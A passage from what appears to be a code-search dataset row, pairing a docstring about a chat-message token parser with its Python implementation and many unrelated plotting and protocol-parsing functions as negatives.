title='Shot #{:d} @ t={:.2f} s'.format(self.shot, self.t))", "def vlook(model):\n plt.close()\n plt.plot(model.rec_t, np.array(model.data[\"soma\"][0]))\n plt.xlabel(\"Time (ms)\")\n plt.ylabel(\"Volgate (mV)\")\n plt.show()\n return len(model.rec_t)", "def plot_data_stats(data_dict, data_bxtxn, data_dt):\n print(onp.mean(onp.sum(data_bxtxn, axis=1)), \"spikes/second\")\n f = plt.figure(figsize=(12,4))\n plt.subplot(141)\n plt.hist(onp.mean(data_bxtxn, axis=1).ravel()/data_dt);\n plt.xlabel('spikes / sec')\n plt.subplot(142)\n plt.imshow(data_dict['hiddens'][0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('Sample trial rates')\n plt.subplot(143);\n plt.imshow(data_bxtxn[0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('spikes')\n plt.subplot(144)\n plt.stem(onp.mean(onp.sum(data_bxtxn, axis=1), axis=0));\n plt.xlabel('neuron #')\n plt.ylabel('spikes / sec');\n return f", "def plot_stability_matrix(self, file_name=None):\n size = len(self.seq) / 2.5\n plt.figure(figsize=(size, 2.5))\n plt.imshow(self.matrix,\n interpolation='none',\n cmap=plt.get_cmap('YlOrRd'))\n plt.yticks(range(4), ['A', 'C', 'G', 'U'], fontsize=12)\n plt.xticks(range(len(self.seq)), fontsize=12)\n if file_name is None:\n plt.show()\n else:\n plt.savefig(file_name,\n bbox_inches='tight',\n transparent=True,\n pad_inches=0)\n plt.close()", "def visualize_days():\n\n # grab our parsed data that we parsed earlier\n data_file = parse(MY_FILE, \",\")\n\n counter = Counter(item['DayOfWeek'] for item in data_file)\n\n data_list = [\n counter['Monday'],\n counter['Tuesday'],\n counter['Wednesday'],\n counter['Thursday'],\n counter['Friday'],\n counter['Saturday'],\n counter['Sunday']\n ]\n\n day_tuple = tuple(['Mon','Tues','Wed','Thurs','Fri','Sat','Sun'])\n\n plt.plot(data_list)\n\n # num of ticks needed for our x-axis & assign labels\n plt.xticks(range(len(day_tuple)),day_tuple)\n \n plt.savefig(\"Days.png\")\n plt.clf()", "def showPlot2():\n interested_in = list(range(1,10))\n proc_sim_data = []\n for item in interested_in:\n len_sim_data = []\n raw_sim_data = runSimulation(item, 1.0, 25, 25, 0.75, 100, Robot, False)\n for mes in raw_sim_data:\n len_sim_data.append(len(mes))\n proc_sim_data.append(sum(len_sim_data)/len(len_sim_data))\n plot(interested_in, proc_sim_data)\n title('Dependence of cleaning time on number of robots')\n xlabel('number of robots (tiles)')\n ylabel('mean time (clocks)')\n show()", "def plot_features(data: np.array)->None:\n n_rows = np.size(data, 0)\n n_cols = np.size(data, 1)\n for i in range(n_cols):\n plt.hist(data[:,i])\n plt.show()", "def plot_example_spectrograms(example,rate):\r\n plt.figure()\r\n \r\n labels = ['REM', 'NREM 1', 'NREM 2', 'NREM 3-4']\r\n \r\n ###YOUR CODE HERE\r\n for i in xrange(0,4):\r\n plt.subplot(2,2,i+1)\r\n plt.specgram(example[i], NFFT=256, Fs=rate, label=labels[i])\r\n plt.ylim( ymax = 30 )\r\n plt.legend()\r\n plt.show()\r\n \r\n return", "def showPlot1():\n\n interested_in = list(range(5,30,5))\n proc_sim_data = []\n for item in interested_in:\n len_sim_data = []\n raw_sim_data = runSimulation(1, 1.0, item, item, 0.75, 100, Robot, False)\n for mes in raw_sim_data:\n len_sim_data.append(len(mes))\n proc_sim_data.append(sum(len_sim_data)/len(len_sim_data))\n plot(interested_in, proc_sim_data)\n title('Dependence of cleaning time on room size')\n xlabel('area of the room (tiles)')\n ylabel('mean time (clocks)')\n show()", "def visualize_days():\n\t\n\t#grab our parsed data that we parsed earlier\n\tdata_file = parse(MY_FILE, 
\",\")\n\t\n\t#make a new variable, counter, from iterating through each line of\n\t#data in the parsed data, and count how many incidents happen on each\n\t#day of the week\n\tcounter = Counter(item[\"DayOfWeek\"] for item in data_file)\n\t\n\t#separate the x-axis data (days of the week) from the counter variable\n\t#from the y-axis (number of incidents each day)\n\tdata_list = [\n\t\t\t\tcounter[\"Monday\"],\n\t\t\t\tcounter[\"Tuesday\"],\n\t\t\t\tcounter[\"Wednesday\"],\n\t\t\t\tcounter[\"Thursday\"],\n\t\t\t\tcounter[\"Friday\"],\n\t\t\t\tcounter[\"Saturday\"],\n\t\t\t\tcounter[\"Sunday\"]\n\t\t\t\t]\n\tday_tuple = tuple([\"Mon\", \"Tues\", \"Wed\", \"Thurs\", \"Fri\", \"Sat\", \"Sun\"])\n\t\n\t#with y-axis data, assign it to a matplotlib plot instance\n\tplt.plot(data_list)\n\t\n\t#create amount of ticks need for x and y axes and assign labels\n\tplt.xticks(range(len(day_tuple)), day_tuple)\n\t\n\t#save the plot\n\tplt.savefig(\"Days.png\")\n\t\n\t#close plot file\n\tplt.clf()", "def showConfusionMatrix(self): \r\n sn.heatmap(self.conf_matrix, annot=True)\r\n plt.plot( label=\"Accuracy\")\r\n plt.plot( label=\"Error\")\r\n plt.figtext(0,0,'Accuracy: {}\\nError: {}\\nRecall: {}\\nPrecision: {}'.format(self.accuracy,\r\n self.error,\r\n self.recall,\r\n self.precision))\r\n plt.title('Confusion Matrix')\r\n plt.show()\r\n return None", "def show():\n plt.show()", "def show():\n plt.show()", "def show():\n plt.show()", "def visualize(self):\n print('{0} is {1} time steps old'.format(self.name, self.timestep))\n\n self.amygdala.visualize(self.timestep, self.name, self.log_dir)\n self.cerebellum.visualize(self.name, self.log_dir)\n self.cingulate.visualize(self.name, self.log_dir)\n self.hippocampus.visualize(self.name, self.log_dir)\n #self.ganglia.visualize(self.name, self.log_dir)\n #self.cortex.visualize(self.name, self.log_dir)", "def grid_plot_twitter(proverbs_list, data,dim = (4,4), ylog = False, rt = False): \n plt.rcParams.update({\n 'font.size': 9,\n 'axes.titlesize': 8,\n 'axes.labelsize': 14,\n 'xtick.labelsize': 7,\n 'ytick.labelsize': 7,\n 'legend.fontsize': 10,\n })\n \n rows, cols = dim[0],dim[1]\n fig = plt.figure(figsize=(12, 5.75))\n gs = gridspec.GridSpec(ncols=cols, nrows=rows)\n gs.update(wspace = 0.2, hspace = 0.2)\n \n \n i = 0\n \n fig.text(0.5, 0.02,'Year' , ha='center', fontsize = 14)\n fig.text(0.02, 0.5, 'Frequency among all {}-grams on Twitter'.format(len(proverbs_list[0].split())), va='center', rotation='vertical', fontsize = 14)\n \n #loop to create each timeseries plot in the grid\n for r in np.arange(0, rows, step=1):\n for c in np.arange(cols):\n\n ax = fig.add_subplot(gs[r, c])\n\n ax.text(0.1,0.9,'\\\"{}\\\"'.format(proverbs_list[i]),horizontalalignment='left', transform=ax.transAxes)\n ts = data[data.proverb ==proverbs_list[i]]\n ts.date = pd.to_datetime(ts.date, format = '%Y-%m-%d', errors='coerce')\n ts.index = ts.date\n ts = ts.sort_index()\n print(ts)\n ts2 = ts.copy()[['freq_noRT', 'freq']]\n print(ts2)\n ts2 = ts2.rolling(window=30).mean()\n print(ts2)\n\n \n if ylog == False:\n pass\n\n elif ylog == True:\n ax.set_yscale('log') \n\n if rt == False:\n ax.plot(ts.index, ts['freq_noRT'], alpha = 0.5, color = 'gray')\n ax.plot(ts2.index, ts2['freq_noRT'], alpha = 0.9, color='darkorange') \n \n elif rt ==True:\n ax.plot(ts.index, ts['freq'], alpha = 0.5, color = 'gray')\n ax.plot(ts2.index, ts2['freq'], alpha = 0.9, color='darkorange')\n i+=1\n \n plt.subplots_adjust(left=0.08, right=0.95, top=0.95, bottom=0.1)", "def plot_dt_signal(x, title=None):\n 
pylab.figure()\n pylab.stem(range(len(x)), x)\n pylab.title(title)\n pylab.xlabel(\"samples\")", "def show_plot() :\n logger.info(\"Show plot\")\n pylab.axis('equal')\n pylab.xlabel(\"Longitud\")\n pylab.ylabel(\"Latitud\")\n pylab.grid(True)\n pylab.title(\"Product tiles and product source\")\n pylab.show()" ]
[ "0.6815102", "0.6405556", "0.6397176", "0.6318654", "0.62567717", "0.62256616", "0.6137152", "0.6075933", "0.603835", "0.60201347", "0.6009235", "0.6006938", "0.5997316", "0.5959236", "0.5952973", "0.5915869", "0.58863264", "0.58826864", "0.5851976", "0.5786718", "0.57783747", "0.57757807", "0.57463545", "0.57421666", "0.57226545", "0.5698058", "0.5697018", "0.5687832", "0.5667979", "0.5644963", "0.56444865", "0.5642347", "0.56419194", "0.56382984", "0.5622541", "0.561776", "0.55808985", "0.558039", "0.55755156", "0.5573985", "0.5572348", "0.55588806", "0.5551681", "0.5514831", "0.55134183", "0.5506285", "0.5505552", "0.5503652", "0.54820687", "0.547955", "0.5477201", "0.54642844", "0.54614335", "0.5459864", "0.5459082", "0.54577315", "0.54565775", "0.54500705", "0.5449431", "0.54426193", "0.5442435", "0.5438719", "0.5429751", "0.54220414", "0.54160863", "0.5404296", "0.5401275", "0.5397828", "0.538191", "0.53779405", "0.5369311", "0.53664505", "0.53628343", "0.5360514", "0.5359291", "0.5355937", "0.53461194", "0.5343525", "0.5342654", "0.5342305", "0.53392833", "0.5335844", "0.5334315", "0.5324168", "0.5318254", "0.53155136", "0.53068537", "0.5304198", "0.52989787", "0.52948034", "0.5293946", "0.528375", "0.5279512", "0.52765024", "0.52765024", "0.52765024", "0.5273928", "0.5263224", "0.5262658", "0.5261213" ]
0.6246299
5
return nothing but store data in self.parse_msg and self.parse_type
def parse(self, message, prefix, cmd_list):
    self.parse_type = ""
    self.parse_msg = []
    for i in message:
        if i[0].isdigit():
            self.parse_number(i, "w")
        elif len(i) == 1:
            self.parse_type += "w"
            self.parse_msg.append(i)
        elif i == "@everyone" or i == "@here":
            self.parse_type += "s"
            self.parse_msg.append(i)
        elif i[0] == prefix:
            self.parse_command(i, cmd_list)
        elif i[0] == "-":
            self.parse_number(i, "o")
        elif i[0] == "<" and len(i) > 3:
            self.parse_mention(i)
        else:
            self.parse_type += "w"
            self.parse_msg.append(i[(i[0] == "\\"):])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse(self, data):\n raise NotImplementedError", "def parse(cls, data):\n raise NotImplementedError", "def _parse(self):\n pass", "def parse_data(self):\n\t\traise NotImplementedError('%s: No parse function implemented!' % self.name)", "def parse(self, message: Message):\n\t\tpass", "def parse(self):\n pass", "def parse(self):\n pass", "def parse(self):\n pass", "def parse(self):\n pass", "def parse(self):", "def parseMsg(self):\n # These 4 elements are always present\n # \"ToUserName\"\n # \"FromUserName\"\n # \"CreateTime\"\n # \"MsgType\"\n\n # Following elements depends on MsgType\n # \"MsgId\"\n # \"Content\"\n # \"MediaId\"\n # \"PicUrl\"\n # \"Format\"\n # \"ThumbMediaId\"\n # \"Location_X\"\n # \"Location_Y\"\n # \"Scale\"\n # \"Label\"\n # \"Title\"\n # \"Description\"\n # \"Url\"\n # \"Event\"\n # \"EventKey\"\n # \"Ticket\"\n # \"Latitude\"\n # \"Longitude\"\n # \"Precision\"\n # \"Recognition\"\n\n def getField(req, key):\n if req.find(key) != None:\n return req.find(key).text\n\n\n msg = {}\n req = et.fromstring(self.request.body.decode(\"utf-8\"))\n\n # These 4 elements are always present\n msg[\"ToUserName\"] = getField(req, \"ToUserName\")\n msg[\"FromUserName\"] = getField(req, \"FromUserName\")\n msg[\"CreateTime\"] = getField(req, \"CreateTime\")\n msg[\"MsgType\"] = getField(req, \"MsgType\")\n\n # Following elements depends on MsgType\n msg[\"MsgId\"] = getField(req, \"MsgId\")\n msg[\"Content\"] = getField(req, \"Content\")\n msg[\"MediaId\"] = getField(req, \"MediaId\")\n msg[\"PicUrl\"] = getField(req, \"PicUrl\")\n msg[\"Format\"] = getField(req, \"Format\")\n msg[\"ThumbMediaId\"] = getField(req, \"ThumbMediaId\")\n msg[\"Location_X\"] = getField(req, \"Location_X\")\n msg[\"Location_Y\"] = getField(req, \"Location_Y\")\n msg[\"Scale\"] = getField(req, \"Scale\")\n msg[\"Label\"] = getField(req, \"Label\")\n msg[\"Title\"] = getField(req, \"Title\")\n msg[\"Description\"] = getField(req, \"Description\")\n msg[\"Url\"] = getField(req, \"Url\")\n msg[\"Event\"] = getField(req, \"Event\")\n msg[\"EventKey\"] = getField(req, \"EventKey\")\n msg[\"Ticket\"] = getField(req, \"Ticket\")\n msg[\"Latitude\"] = getField(req, \"Latitude\")\n msg[\"Longitude\"] = getField(req, \"Longitude\")\n msg[\"Precision\"] = getField(req, \"Precision\")\n msg[\"Recognition\"] = getField(req, \"Recognition\")\n return msg", "def parse(self):\n raise NotImplementedError", "def parse(self, data: Any) -> Any:\n if self._parse:\n return self._parse(data)\n else:\n return data", "def parse_message(self, message):\n pass", "def parse(self) -> None:\n pass", "def _parse(self) -> bool:\n\n # First, check if this packet has a '!' at an offset position\n # This is allowed as per APRS 1.01 C5 P18\n if hasattr(self, '_offset'):\n # Packets with the '!' 
offset do not have a timestamp or messaging capabilities\n # Chop everything off the info field before the '!'\n self._info = self._info[self._offset:]\n\n elif self.data_type_id == '!':\n # Packet has no timestamp, station has no messaging capability\n self.timestamp = None\n self.messaging = False\n\n elif self.data_type_id == '/':\n # Packet has timestamp, station has no messaging capability\n self.messaging = False\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n elif self.data_type_id == '=':\n # Packet has no timestamp, station has messaging capability\n self.timestamp = None\n self.messaging = True\n\n elif self.data_type_id == '@':\n # Packet has timestamp, station has messaging capability\n self.messaging = True\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n else:\n # This isn't a position packet\n raise ParseError(\"Unknown position data type: {}\".format(self.data_type_id))\n\n if self.timestamp is None:\n data = self._info\n else:\n data = self._info[7:]\n\n # Check to see if the position data is compressed or uncompressed\n if re.match(r'[0-9\\s]{4}\\.[0-9\\s]{2}[NS].[0-9\\s]{5}\\.[0-9\\s]{2}[EW]', data):\n # Parse the uncompressed position values from the information field\n (self.latitude, self.longitude, self.ambiguity, self.symbol_table, self.symbol_id\n ) = self._parse_uncompressed_position(data)\n\n # Ensure compressed is set to False\n self.compressed = False\n\n if len(data) > 19:\n # This packet has additional data in the information field, so attempt to parse it\n (phg, radio_range, dfs, self.course, self.speed, self.altitude,\n comment) = self._parse_data(data[19:])\n\n if self.symbol_table == \"/\" and self.symbol_id == \"\\\\\":\n # If the symbol table is /, and the symbol ID is \\, it implies a DF report\n # 26th and 30th characters should be /\n logger.debug(\"Symbol table and symbol indicates a DF report\")\n\n if len(comment) < 8:\n # Packets with DF information must be at least 8 characters long\n raise ParseError(\"Missing DF values\")\n\n if comment[0] != \"/\" or comment[4] != \"/\":\n # Packets with DF information must also include the bearing and NRQ values\n # See APRS 1.01 C7 P30\n raise ParseError(\n \"Invalid DF values (character in position 0 and 4 should be '/'\"\n )\n\n # Extract the bearing\n self.bearing = int(comment[1:4])\n logger.debug(f\"DF bearing is {self.bearing} degrees\")\n\n # Decode the NRQ value\n (self.number, self.df_range, self.quality) = APRSUtils.decode_nrq(comment[5:8])\n\n # Strip the bearing/NRQ value from the comment\n self.comment = comment[8:]\n\n elif self.symbol_table in [\"/\", \"\\\\\"] and self.symbol_id == \"_\":\n # / or \\, and _ for the symbol table and symbol implies a weather report\n # TODO - Implementation\n logger.debug(\"Symbol table and symbol indicates a weather report\")\n\n elif phg:\n # Decode the power, height, gain and directivity values\n (self.power, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_phg(phg)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif radio_range:\n # The radio range is specified as 4 digits, which denote the range in miles\n self.radio_range = int(radio_range)\n logger.debug(f\"Radio range is {radio_range} miles\")\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif dfs:\n # Decode the signal strength, height, gain and directivity values\n 
(self.strength, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_dfs(dfs)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n else:\n # No additional data found\n self.comment = comment\n\n else:\n # Parse the compressed position values from the information field\n\n # Get the compressed position\n compressed_position = data[0:13]\n\n try:\n (self.latitude, self.longitude, self.altitude, self.course, self.speed,\n self.radio_range, self.compression_fix, self.compression_source,\n self.compression_origin) = self._parse_compressed_position(compressed_position)\n\n except Exception as e:\n # TODO Catch specific errors (for example, OverflowError)\n raise ParseError(\"Couldn't parse compressed position: {}\".format(e))\n\n # Ensure compressed is set to True\n self.compressed = True\n\n # Parse the symbol table and symbol ID\n self.symbol_table = data[0]\n self.symbol_id = data[9]\n\n # TODO - parse altitude information\n\n self.comment = data[13:]\n logger.debug(\"Comment is {}\".format(self.comment))\n\n # If we get this far, then we've parsed the packet\n return True", "def parse(self, input_data, reason):\n raise NotImplementedError()", "def parse_string(self, data):\n pass", "def parse_replaydata(self):\n pass", "def parse(self, input):\n pass", "def _parse_msg(self, msg):\n try:\n self.received_msg += msg.decode()\n except:\n self.log.warning(\"invalid parse frame '%s'\" % msg)\n\n while True:\n pos = self.received_msg.find('\\r')\n if pos == -1: # no full msg\n break\n m = self.received_msg[:pos].strip()\n if not len(m):\n break\n self.platform.process_received_message(m)\n self.received_msg = self.received_msg[pos + 1:]", "def _parse_message(self, data):\n try:\n _, values = data.split(':')\n self.serial_number, self.value = values.split(',')\n self.value = int(self.value, 16)\n\n is_bit_set = lambda b: self.value & (1 << (b - 1)) > 0\n\n # Bit 1 = unknown\n self.battery = is_bit_set(2)\n self.supervision = is_bit_set(3)\n # Bit 4 = unknown\n self.loop[2] = is_bit_set(5)\n self.loop[1] = is_bit_set(6)\n self.loop[3] = is_bit_set(7)\n self.loop[0] = is_bit_set(8)\n\n except ValueError:\n raise InvalidMessageError('Received invalid message: {0}'.format(data))", "def parse(self):\n\t\tsub = self.body.split(' ')\n\t\tif len(sub) == 3:\n\t\t\tself.latitude = float(sub[1])\n\t\t\tself.longitude = float(sub[2])\n\t\telse:\n\t\t\tself.latitude = None\n\t\t\tself.longitude = None\n\t\t\traise Exception(\"Invalid message\")", "def parse(self, content):\n pass", "def parse_mess_ASCII(self, mess):\n # Decode message - possibly not necessary if we are doing this in the receiving stage\n mess_str = mess.decode(self.encoding)\n\n # Extract individual data-points into list\n mess_list = mess_str.split(' ')\n\n mess_type = mess_list[0]\n\n # Maybe do more with this function, or perhaps just do these basics, and let further processing be done once the response type is known\n return mess_type, mess_list", "def parse(self) :\n self._curname = None\n self._curattributes = None\n \n self.setVersion((ord(self._data[0]), ord(self._data[1])))\n self.setOperationId(unpack(\">H\", self._data[2:4])[0])\n self.setRequestId(unpack(\">I\", self._data[4:8])[0])\n self.position = 8\n endofattributes = self.tagvalues[\"end-of-attributes-tag\"]\n maxdelimiter = self.tagvalues[\"event_notification-attributes-tag\"]\n nulloffset = lambda : 0\n #try :\n if 1:\n tag = ord(self._data[self.position])\n while tag != endofattributes :\n self.position += 1\n name = 
self.tags[tag]\n if name is not None :\n func = getattr(self, name.replace(\"-\", \"_\"), nulloffset)\n self.position += func()\n if ord(self._data[self.position]) > maxdelimiter :\n self.position -= 1\n continue\n oldtag = tag\n tag = ord(self._data[self.position])\n if tag == oldtag :\n self._curattributes.append([])\n #except IndexError :\n # raise IPPError, \"Unexpected end of IPP message.\"\n \n self.data = self._data[self.position+1:]\n self.parsed = True", "def _unserialize_body(self, data, struct, persistent_end):\n initialized = False\n while len(data) >= 0:\n try:\n # ParseFromString will ignore all data after it\n # has finished parsing a message from the start\n # of the data. By default `message + garbage`\n # will parse `message` perfectly fine.\n # This becomes a problem when `garbage` contains\n # another message.\n struct.ParseFromString(data)\n initialized = struct.IsInitialized()\n if initialized or len(data) == 0:\n break\n except google.protobuf.message.DecodeError, e:\n pass\n if not persistent_end:\n break\n data = data[:-1]\n return initialized, struct, len(struct.SerializePartialToString())", "def _process_msg(cls, msg):\n raise NotImplementedError", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def _build_parsed_values(self):\n\n self.final_result = []\n retrieved_data_types = set() # keep track of data type ID's unpacked from record\n\n # Get the file time from the file name\n if self._file_time:\n self.final_result.append(self._encode_value(\n AdcptMWVSParticleKey.FILE_TIME, self._file_time, str))\n else:\n self.final_result.append({DataParticleKey.VALUE_ID: AdcptMWVSParticleKey.FILE_TIME,\n DataParticleKey.VALUE: None})\n\n # Get the sequence number from the file name\n if self._sequence_number:\n self.final_result.append(self._encode_value(\n AdcptMWVSParticleKey.SEQUENCE_NUMBER, self._sequence_number, int))\n else:\n self.final_result.append({DataParticleKey.VALUE_ID: AdcptMWVSParticleKey.SEQUENCE_NUMBER,\n DataParticleKey.VALUE: None})\n\n # Get the number of data types from the Header\n num_data_types = struct.unpack_from('<B', self.raw_data, HEADER_NUM_DATA_TYPES_OFFSET)\n # Get the list of offsets from the Header\n offsets = struct.unpack_from('<%sI' % num_data_types, self.raw_data, HEADER_OFFSETS_OFFSET)\n\n # Unpack Type IDs from the offsets\n for offset in offsets:\n data_type_id, = struct.unpack_from('<h', self.raw_data, offset)\n # keep track of 
retrieved data types\n retrieved_data_types.add(data_type_id)\n\n # Feed the data through the corresponding encoding function and unpacking rules\n try:\n self.encoding_func_dict[data_type_id][ENCODE_FUNC](\n offset + ID_TYPE_SIZE, self.encoding_func_dict[data_type_id][UNPACK_RULES])\n except KeyError:\n log.debug(\"Skipping unsupported data type ID: %s at offset: %s\",\n data_type_id, offset)\n\n # go through the list of expected data type ID's, fill in None for missing data type ID's\n missing_data = EXPECTED_PARTICLE_IDS_SET.difference(retrieved_data_types)\n for data_type_id in missing_data:\n if data_type_id is VARIABLE_LEADER:\n # timestamp is essential for a data particle - no timestamp, no particle\n message = \"Variable Leader Data Type is required for internal timestamp, \" \\\n \"particle ignored.\"\n log.warn(message)\n raise RecoverableSampleException(message)\n\n self.final_result.extend(self.encoding_func_dict[data_type_id][ENCODE_NULL])\n\n log.trace(\"FINAL RESULT: %s\\n\", self.final_result)\n\n return self.final_result", "def parse_message(msg):\n # the message number, increments with each message\n msg_number = msg[0][0]\n # the message type\n msg_type = msg[0][1][0]\n return {\n 'noop': parse_noop_message,\n 'c': parse_content_message,\n }[msg_type](msg, msg_number)", "def process_data(self, data):\n return data", "def _parse_message(self, string, protocol):\n #print(\"Parsing message: %s\" % string)\n msg = parse_message_string(string)\n result = MessageResult(original_message=msg)\n\n if isinstance(msg, MethodCallMessage):\n # Handle method call\n res = self._method_call(msg)\n response_msg = ResponseMessage(result_code=0, result=res, response_to=msg.id)\n result.response = create_message_string(response_msg)\n elif isinstance(msg, SubscribeMessage):\n # Handle subscription to event\n response_msg = ResponseMessage(result_code=0, result=None, response_to=msg.id)\n result.response = create_message_string(response_msg)\n else:\n raise MessageHandleError(MessageHandleError.RESULT_UNEXPECTED_MESSAGE, msg)\n\n return result", "def decode(self) -> None:\n self.msg_type = AISType(self.nmea.ais_id)\n self.content = decode(self.nmea)", "def parse_response(self):\n pass", "def process(self) -> None:\n self.parsed = email.message_from_bytes(self.rawmailcontent, policy=email.policy.EmailPolicy()) # type: email.message.EmailMessage\n\n self.subject = self.parsed[\"subject\"]\n\n if self.parsed[\"X-Jicket-Initial-ReplyID\"] is not None and self.parsed[\"X-Jicket-Initial-ReplyID\"] == self.parsed[\"In-Reply-To\"]:\n self.threadstarter = True\n elif self.config.ticketAddress in self.parsed[\"From\"]: # Take more heuristic approach\n self.threadstarter = True\n\n self.rawmailcontent = None # No need to store after processing\n\n self.get_text_bodies(self.parsed)\n self.textfrombodies()", "def extract(self, data):", "def parse(string):\n if string.strip() == Parser.OK_MSG or string.startswith(Parser.NOT_OK_MSG):\n return Parser._handle_ok_ack(string)\n results = Parser._handle_dict(string)\n results.extend(Parser._handle_else(string))\n return results", "def parse(self, data):\r\n\r\n parser.Parser.parse(self, data)\r\n\r\n # in case the current state of the parser is finished, must\r\n # reset the state to the start position as the parser is\r\n # re-starting (probably a new data sequence)\r\n if self.state == FINISH_STATE: self.clear()\r\n\r\n # retrieves the size of the data that has been sent for parsing\r\n # and saves it under the size original variable\r\n size = len(data)\r\n 
size_o = size\r\n\r\n # iterates continuously to try to process all that\r\n # data that has been sent for processing\r\n while size > 0:\r\n\r\n if self.state <= self.state_l:\r\n method = self.states[self.state - 1]\r\n count = method(data)\r\n if count == -1: break\r\n if count == 0: continue\r\n\r\n size -= count\r\n data = data[count:]\r\n\r\n continue\r\n\r\n elif self.state == FINISH_STATE:\r\n self.clear()\r\n\r\n continue\r\n\r\n else:\r\n raise netius.ParserError(\"Invalid state '%d'\" % self.state)\r\n\r\n # in case not all of the data has been processed\r\n # must add it to the buffer so that it may be used\r\n # latter in the next parsing of the message\r\n if size > 0: self.buffer.append(data)\r\n\r\n # returns the number of read (processed) bytes of the\r\n # data that has been sent to the parser\r\n return size_o - size", "def _decode_message(self, label: str, buf, typedef=None, pos=0, end=None, group=False):\n print(str(pos) + \" decode_message \" + label)\n if end is None:\n end = len(buf)\n\n if typedef is None:\n typedef = {}\n else:\n # Don't want to accidentally modify the original\n typedef = copy.deepcopy(typedef)\n output = {}\n\n while pos < end:\n oldpos = pos\n tag, pos = decoder._DecodeVarint(buf, pos)\n try:\n field_number, wire_type = wire_format.UnpackTag(tag)\n except Exception as exc:\n raise (ValueError,\n 'Could not read valid tag at pos %d. Ensure it is a valid protobuf message: %s'\n % (pos-len(tag), exc), sys.exc_info()[2])\n # Convert to str\n field_number = str(field_number)\n orig_field_number = field_number\n \n field_typedef = None\n if field_number in typedef:\n field_typedef = typedef[field_number]\n else:\n field_typedef = {}\n field_typedef['type'] = self.wire_type_defaults[wire_type]\n field_type = field_typedef['type']\n if self.debug:\n ft = field_type\n if ft == None:\n ft = \"None\"\n print(\"@\" + str(oldpos) + \"-\" + str(pos-1) + \":\" + label + \" field_number \" +\n str(field_number) +\n \" wire_type \" + str(wire_type) +\n \" field_type \" + str(ft))\n # If field_type is None, its either an unsupported wire type, length delim or group\n # length delim we have to try and decode first\n field_out = None\n if field_type == 'LD':\n field_out, pos = self.decode_message_LD(label, buf, pos, field_typedef)\n elif field_type == 'endGroup':\n # TODO Should probably match the field_number to START_GROUP\n if not group:\n raise ValueError(\"Found END_GROUP before START_GROUP\")\n # exit out\n return output, typedef, pos\n elif field_type == 'message':\n field_out, pos = self.decode_message_message(\n label, buf, pos, field_typedef, field_number)\n elif field_type == 'group':\n group_typedef = None\n # Check for a anonymous type\n if 'group_typedef' in field_typedef:\n group_typedef = field_typedef['group_typedef']\n field_out, group_typedef, pos = self.decode_group(\n label, buf, group_typedef, pos)\n # Save type definition\n field_typedef['group_typedef'] = group_typedef\n else:\n # Verify wiretype matches\n if self.wiretypes[field_type] != wire_type:\n raise ValueError(\"Invalid wiretype for field number %s. 
%s is not wiretype %s\"\n % (field_number, field_type, wire_type))\n # Simple type, just look up the decoder\n field_out, pos = self.decoders[field_type](buf, pos)\n field_typedef['type'] = field_type\n if 'name' not in field_typedef:\n field_typedef['name'] = ''\n field_key = field_number\n if '-' not in field_number and 'name' in field_typedef and field_typedef['name'] != '':\n field_key = field_typedef['name']\n # Deal with repeats\n if field_key in output:\n if isinstance(field_out, list):\n if isinstance(output[field_number], list):\n output[field_key] += field_out\n else:\n output[field_key] = field_out.append(output[field_key])\n else:\n if isinstance(output[field_number], list):\n output[field_key].append(field_out)\n else:\n output[field_key] = [output[field_key], field_out]\n else:\n output[field_key] = field_out\n typedef[orig_field_number] = field_typedef\n if self.debug:\n print(str(field_key) + \" field_out:\" + str(field_out))\n if pos > end:\n raise decoder._DecodeError(\"Invalid Message Length, pos=\" +\n str(pos) + \" end=\" + str(end))\n # Should never hit here as a group\n if group:\n raise ValueError(\"Got START_GROUP with no END_GROUP.\")\n print(\"decode_message finish \" + str(pos))\n return output, typedef, pos", "def postparse(self, parse_result):\n return parse_result", "def _parseData(self, payload):\n out=[]\n bytesParsed = 0\n while bytesParsed < len(payload):\n\n #check for the extended Code Level, code and length\n #count the number of EXCODE_BYTE\n #extendedCodeLevel = sum([1 for x in data if x == EXCODE_BYTE] )\n #bytesParsed += extendedCodeLevel\n\n #identify the length of the expected bytes in the payload\n code = payload[bytesParsed]\n bytesParsed +=1\n if code > 0x7F:\n # multi-byte code, length > 1\n length = payload[bytesParsed]\n bytesParsed +=1\n else:\n length = 1\n\n if code == SENSOR_STATUS:\n # value of 0==no contact, 200==contact\n #print \"leadoff: %i\" % payload[bytesParsed]\n out.append( {'timestamp': self.curtime, 'leadoff': payload[bytesParsed] } )\n bytesParsed +=1\n\n elif code == HEART_RATE:\n #print \"HR: %i\" % payload[bytesParsed]\n out.append( {'timestamp': self.curtime, 'HR': payload[bytesParsed:] } )\n bytesParsed +=1\n\n elif code == CONFIG_BYTE:\n 